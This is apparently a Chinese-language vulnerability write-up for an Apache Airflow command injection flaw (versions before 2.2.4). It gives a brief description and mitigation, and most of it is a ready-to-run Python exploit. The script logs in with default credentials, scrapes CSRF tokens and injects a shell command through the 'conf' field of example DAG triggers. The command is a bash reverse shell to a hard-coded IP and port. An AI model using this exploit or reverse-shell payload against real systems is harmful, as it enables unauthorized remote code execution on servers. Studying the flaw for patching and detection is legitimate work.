一、描述
在 Apache Airflow 2.2.4 之前的版本中,一些示例 DAG 没有正确清理用户提供的参数,使其容易受到来自 Web UI 的 OS 命令注入的影响。
二、缓解:
这可以通过确保[core] load_examples
设置为来缓解False
。
三、 EXP
(payload1 2是俩个不同利用点,选择用一个就行)
import requests
import re
import random
proxy = {
"http": "http://127.0.0.1:8080",
"https": "https://127.0.0.1:8080"
}
def dl(url, user, pwd):
urls = url + '/login/?next=' + url + '/home'
rep = requests.get(url)
session = rep.headers['Set-Cookie'].split()[0].replace(';', '')
csrf = re.findall(r"var csrfToken = '(.+?)'", rep.text)[0]
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/99.0.4844.84 Safari/537.36",
"Cookie": session
}
data = {
'csrf_token': csrf,
'username': user,
'password': pwd
}
reps = requests.post(urls, data=data, headers=headers)
s1 = reps.headers['Set-Cookie'].split()[0].replace(';', '')
c1 = re.findall(r"var csrfToken = '(.+?)'", reps.text)[0]
return s1, c1
def payload1(urll, sess, csrf, cmd):
urls = urll + '/trigger?dag_id=example_passing_params_via_test_command'
code1 = random.randint(0, 60)
dates = '2022-04-02 09:88:31+00:00'
dates1 = dates.replace('88', str(code1))
cmds = '{"foo":"\\";' + cmd + ';\\""}'
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
"Accept": "text/html",
"Cookie": sess,
}
print(dates1)
data = {
'csrf_token': csrf,
'dag_id': 'example_passing_params_via_test_command',
'origin': '/home',
'execution_date': dates1,
'conf': cmds,
'unpause': 'on'
}
rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
print(rep.status_code)
def payload2(urll, sess, csrf, cmd):
urls = urll + '/trigger?dag_id=tutorial'
code1 = random.randint(0, 60)
dates = '2022-04-02 09:88:31+00:00'
dates1 = dates.replace('88', str(code1))
cmds = '{"my_param":"\\";' + cmd + ';\\""}'
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36",
"Accept": "text/html",
"Cookie": sess,
}
print(dates1)
data = {
'csrf_token': csrf,
'dag_id': 'tutorial',
'origin': '/home',
'execution_date': dates1,
'conf': cmds,
'unpause': 'on'
}
rep = requests.post(urls, data=data, headers=headers, proxies=proxy)
print(rep.status_code)
if __name__ == '__main__':
user = 'airflow'
pwd = 'airflow'
url = input("url __>:")
#url = 'http://192.168.153.131:8080'
cmd = 'bash -i >& /dev/tcp/192.168.153.131/9999 0>&1'
s1, c1 = dl(url, user, pwd)
print(f'Command __>: {cmd}')
#payload1(url, s1, c1, cmd)
payload2(url, s1, c1, cmd)